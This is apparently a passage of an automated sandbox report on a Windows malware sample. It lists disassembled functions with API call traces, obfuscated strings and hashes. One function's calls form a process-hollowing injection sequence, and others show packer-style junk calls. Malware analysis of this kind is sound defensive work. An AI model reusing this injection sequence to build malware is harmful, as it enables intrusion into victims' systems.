                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 02590110 Relevance: 22.7, APIs: 15, Instructions: 248memorynativethreadCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 02590156
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0259016C
                                                                                                                                                                                                                                                                                                                                                                  • CreateProcessA.KERNELBASE(?,00000000), ref: 02590255
                                                                                                                                                                                                                                                                                                                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02590270
                                                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02590283
                                                                                                                                                                                                                                                                                                                                                                  • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 0259029F
                                                                                                                                                                                                                                                                                                                                                                  • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 025902C8
                                                                                                                                                                                                                                                                                                                                                                  • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 025902E3
                                                                                                                                                                                                                                                                                                                                                                  • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 02590304
                                                                                                                                                                                                                                                                                                                                                                  • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0259032A
                                                                                                                                                                                                                                                                                                                                                                  • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 02590399
                                                                                                                                                                                                                                                                                                                                                                  • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 025903BF
                                                                                                                                                                                                                                                                                                                                                                  • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 025903E1
                                                                                                                                                                                                                                                                                                                                                                  • ResumeThread.KERNELBASE(00000000), ref: 025903ED
                                                                                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32(00000000), ref: 02590412
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2377350104.0000000002590000.00000040.00001000.00020000.00000000.sdmp, Offset: 02590000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_2590000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 93872480-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e71f303bade23dde5dae0db4c593321e2c6a114cab23b8b81b67a50db087bebb
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BCB1C774A00208AFDB44CF98C895F9EBBB5FF88314F248158E909AB391D771AE41CF94
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 005CBF60 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67timeCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 33 5cbf60-5cbf8b call 40c410 36 5cbf90-5cbf9b 33->36 37 5cbf9d-5cbfa5 GetSystemTimes 36->37 38 5cbfaa-5cbfab 36->38 37->38 38->36 39 5cbfad-5cbfbb 38->39 40 5cbfc0-5cbfc5 39->40 41 5cbff7-5cbffd 40->41 42 5cbfc7-5cbff2 FlushFileBuffers GetVolumeInformationW 40->42 43 5cc00e-5cc013 41->43 44 5cbfff-5cc009 41->44 42->41 45 5cc029-5cc030 43->45 46 5cc015-5cc01f 43->46 44->43 45->40 47 5cc032 call 5cbb00 45->47 46->45 49 5cc037-5cc050 call 401114 47->49
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetSystemTimes.KERNEL32(00000000,00000000,00000000,?,00000000,?,004015D9,00400000,00000000,00000000,0000000A), ref: 005CBFA3
                                                                                                                                                                                                                                                                                                                                                                  • FlushFileBuffers.KERNEL32(00000000,?,00000000,?,004015D9,00400000,00000000,00000000,0000000A), ref: 005CBFC9
                                                                                                                                                                                                                                                                                                                                                                  • GetVolumeInformationW.KERNEL32(Xediko poxucaze mavegogeje,?,00000000,?,?,?,?,00000000,?,00000000,?,004015D9,00400000,00000000,00000000,0000000A), ref: 005CBFF0
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • Xediko poxucaze mavegogeje, xrefs: 005CBFEB
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2375220659.0000000000413000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375140253.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375979297.00000000005D3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376031599.00000000005D7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376080189.00000000005D8000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376151324.00000000005D9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376228703.00000000005E3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: BuffersFileFlushInformationSystemTimesVolume
                                                                                                                                                                                                                                                                                                                                                                  • String ID: Xediko poxucaze mavegogeje
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2067870256-956893252
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9c29d636fe28b14d3de728b9c223744619c8f181c28315f7079e307b9bcecf7e
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 87dcb88028291979576ac45ced47dbc9f44253d819400ab168a2741bc158dbd3
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9c29d636fe28b14d3de728b9c223744619c8f181c28315f7079e307b9bcecf7e
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D72199726152009FE330DB94DC45FAAB7A8F7A8714F01052FE184D72D4D7B4A9499BA2
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 02590420 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 16 2590420-25904f8 18 25904fa 16->18 19 25904ff-259053c CreateWindowExA 16->19 20 25905aa-25905ad 18->20 21 259053e 19->21 22 2590540-2590558 PostMessageA 19->22 21->20 23 259055f-2590563 22->23 23->20 24 2590565-2590579 23->24 24->20 26 259057b-2590582 24->26 27 25905a8 26->27 28 2590584-2590588 26->28 27->23 28->27 29 259058a-2590591 28->29 29->27 30 2590593-2590597 call 2590110 29->30 32 259059c-25905a5 30->32 32->27
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 02590533
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2377350104.0000000002590000.00000040.00001000.00020000.00000000.sdmp, Offset: 02590000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_2590000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateWindow
                                                                                                                                                                                                                                                                                                                                                                  • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 716092398-2341455598
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ded61104ceecf24b4fdf00cbe7125cddabe30f58d8c82e1a01c588d7f32b7e3e
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 86510870D08388DAEF11CBA8C849BDDBFB2AF11708F144058D5486F2C6C3BA5A58CB66
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 025905B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 52 25905b0-25905d5 53 25905dc-25905e0 52->53 54 259061e-2590621 53->54 55 25905e2-25905f5 GetFileAttributesA 53->55 56 2590613-259061c 55->56 57 25905f7-25905fe 55->57 56->53 57->56 58 2590600-259060b call 2590420 57->58 60 2590610 58->60 60->56
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetFileAttributesA.KERNELBASE(apfHQ), ref: 025905EC
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2377350104.0000000002590000.00000040.00001000.00020000.00000000.sdmp, Offset: 02590000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_2590000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                                                                  • String ID: apfHQ$o
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3188754299-2999369273
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9691c49a11babdf1c1a7ac1102ae81560e4cca2e4096817e99ec8a3f95db1cfe
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F012170C0425CEEDF10DB98C5183AEBFB5AF41308F1484DDC4492B281D7769B59CBA5
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 005CB920 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9libraryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 61 5cb920-5cb956 LoadLibraryA
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNELBASE(msimg32.dll,005CBE83), ref: 005CB950
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2375220659.0000000000413000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375140253.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375979297.00000000005D3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376031599.00000000005D7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376080189.00000000005D8000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376151324.00000000005D9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376228703.00000000005E3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                                                                                                                                                                                                                  • String ID: msimg32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1029625771-3287713914
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: d69ac8f07516ae5babaf28393494b8700a043927d8e5ec5c2d50b68a6a375d74
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 891abc78e4b4e0e2f99fad0386603cce6b3cb964d1c837374360e84fa538d917
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d69ac8f07516ae5babaf28393494b8700a043927d8e5ec5c2d50b68a6a375d74
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 25D0C26456B38099CB71CF24BA497553FF0B731704B54514BD0509A372CBB4494DFB9A
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 023CC7C6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 62 23cc7c6-23cc7df 63 23cc7e1-23cc7e3 62->63 64 23cc7ea-23cc7f6 CreateToolhelp32Snapshot 63->64 65 23cc7e5 63->65 66 23cc7f8-23cc7fe 64->66 67 23cc806-23cc813 Module32First 64->67 65->64 66->67 72 23cc800-23cc804 66->72 68 23cc81c-23cc824 67->68 69 23cc815-23cc816 call 23cc485 67->69 73 23cc81b 69->73 72->63 72->67 73->68
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 023CC7EE
                                                                                                                                                                                                                                                                                                                                                                  • Module32First.KERNEL32(00000000,00000224), ref: 023CC80E
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2377117424.00000000023CC000.00000040.00000020.00020000.00000000.sdmp, Offset: 023CC000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_23cc000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3833638111-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 98b62ad194d86e49ad09200c6cf6cde39db5942ce54ee6796f28df6422dcede0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4FF062326007106FD7203BB5A88DB6B76E8EF49629F20192EE64AD10C0DB70EC454B61
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 023CC485 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 75 23cc485-23cc4bf call 23cc798 78 23cc50d 75->78 79 23cc4c1-23cc4f4 VirtualAlloc call 23cc512 75->79 78->78 81 23cc4f9-23cc50b 79->81 81->78
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 023CC4D6
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2377117424.00000000023CC000.00000040.00000020.00020000.00000000.sdmp, Offset: 023CC000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_23cc000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 04ce0ec561174cb1278ddd8ad414f7c173d3ea0db09c128c7d6e77c26ff74221
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D3113979A00208EFDB01DF98C985E99BBF5EF08350F1580A5F9489B361D371EA90EF80
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 005CB040 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 85 5cb040-5cb053 LocalAlloc
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNELBASE(00000000,?,005CBE21), ref: 005CB048
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2375220659.0000000000413000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375140253.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375979297.00000000005D3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376031599.00000000005D7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376080189.00000000005D8000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376151324.00000000005D9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376228703.00000000005E3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AllocLocal
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3494564517-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 712627f6e3d671fe9d165d5daeeadb9750f9c8d6018b204c39530778e68b6b22
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: fd58ec759ed296cf03c4c8f392bb4d7a75ea53041bc90eac38f44cbd12a28a23
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 712627f6e3d671fe9d165d5daeeadb9750f9c8d6018b204c39530778e68b6b22
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D9B092B1103100DBE3208BA0AE48B103BA8E324602F010213B60085660CB701808AA21
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                                                                                                                                                  Function 005CBB00 Relevance: 70.2, APIs: 31, Strings: 9, Instructions: 248timememorywindowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 96 5cbb00-5cbb1e call 40c410 99 5cbb29-5cbb30 96->99 100 5cbb6c-5cbb73 99->100 101 5cbb32-5cbb53 GetTickCount SetLastError GetConsoleAliasesW 99->101 102 5cbb7e-5cbb85 100->102 103 5cbb6a 101->103 104 5cbb55-5cbb5c 101->104 108 5cbbaf-5cbbb6 102->108 109 5cbb87-5cbb8e 102->109 103->99 105 5cbb5e-5cbb62 CreateDirectoryW 104->105 106 5cbb68 104->106 105->106 106->100 112 5cbbbc-5cbc26 InterlockedIncrement DestroyIcon call 4066f0 SetDefaultCommConfigW FreeEnvironmentStringsW GetCurrentDirectoryA EnumDateFormatsExA 108->112 113 5cbc5d-5cbc67 108->113 110 5cbb9c-5cbba3 109->110 111 5cbb90-5cbb96 109->111 116 5cbbad 110->116 117 5cbba5-5cbba7 ResetEvent 110->117 111->110 126 5cbc28-5cbc2a GetStartupInfoW 112->126 127 5cbc30-5cbc37 112->127 114 5cbe1c-5cbe2b call 5cb040 113->114 115 5cbc6d-5cbc8b 113->115 131 5cbe3c-5cbe48 114->131 119 5cbc8d-5cbc99 OpenJobObjectA 115->119 120 5cbca3-5cbe19 GetConsoleAliasesLengthA DnsHostnameToComputerNameA WideCharToMultiByte GetLocaleInfoA TzSpecificLocalTimeToSystemTime SetCurrentDirectoryA MoveFileExW OpenWaitableTimerA CompareStringW GetProcessHeap call 40129d call 401123 * 2 call 4066f0 call 401123 call 401000 call 401286 call 401427 115->120 116->102 117->116 119->120 120->114 126->127 128 5cbc4d-5cbc5a call 401010 127->128 129 5cbc39-5cbc47 GetModuleHandleExA 127->129 128->113 129->128 134 5cbe7e-5cbe83 call 5cb920 call 5cb070 131->134 135 5cbe4a-5cbe7c 131->135 144 5cbe88-5cbe9f call 5cba50 134->144 135->131 151 5cbeb0-5cbeba 144->151 153 5cbebc-5cbec3 151->153 154 5cbef1 151->154 156 5cbec5-5cbecb SetProcessWorkingSetSize 153->156 157 5cbed1-5cbedb 153->157 154->154 156->157 159 5cbedd-5cbee9 157->159 160 5cbeef 157->160 159->160 160->151
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 005CBB32
                                                                                                                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 005CBB3A
                                                                                                                                                                                                                                                                                                                                                                  • GetConsoleAliasesW.KERNEL32(00000000,00000000,00000000), ref: 005CBB46
                                                                                                                                                                                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 005CBB62
                                                                                                                                                                                                                                                                                                                                                                  • ResetEvent.KERNEL32(00000000), ref: 005CBBA7
                                                                                                                                                                                                                                                                                                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 005CBBC0
                                                                                                                                                                                                                                                                                                                                                                  • DestroyIcon.USER32(00000000), ref: 005CBBC8
                                                                                                                                                                                                                                                                                                                                                                  • _memset.LIBCMT ref: 005CBBE3
                                                                                                                                                                                                                                                                                                                                                                  • SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 005CBBF6
                                                                                                                                                                                                                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 005CBBFE
                                                                                                                                                                                                                                                                                                                                                                  • GetCurrentDirectoryA.KERNEL32(00000000,?), ref: 005CBC0D
                                                                                                                                                                                                                                                                                                                                                                  • EnumDateFormatsExA.KERNEL32(00000000,00000000,00000000), ref: 005CBC19
                                                                                                                                                                                                                                                                                                                                                                  • GetStartupInfoW.KERNEL32(00000000), ref: 005CBC2A
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleExA.KERNEL32(00000000,tasazonobuwesixit,?), ref: 005CBC47
                                                                                                                                                                                                                                                                                                                                                                  • OpenJobObjectA.KERNEL32(00000000,00000000,00000000), ref: 005CBC93
                                                                                                                                                                                                                                                                                                                                                                  • GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 005CBCA5
                                                                                                                                                                                                                                                                                                                                                                  • DnsHostnameToComputerNameA.KERNEL32(royariciguvecogowaditumihavozofilacuhadaxedayexecojafalanocitikogeduluwanifapu,?,?), ref: 005CBCBE
                                                                                                                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005CBCD4
                                                                                                                                                                                                                                                                                                                                                                  • GetLocaleInfoA.KERNEL32(00000000,00000000,?,00000000), ref: 005CBCE7
                                                                                                                                                                                                                                                                                                                                                                  • TzSpecificLocalTimeToSystemTime.KERNEL32(?,00000000,00000000), ref: 005CBD40
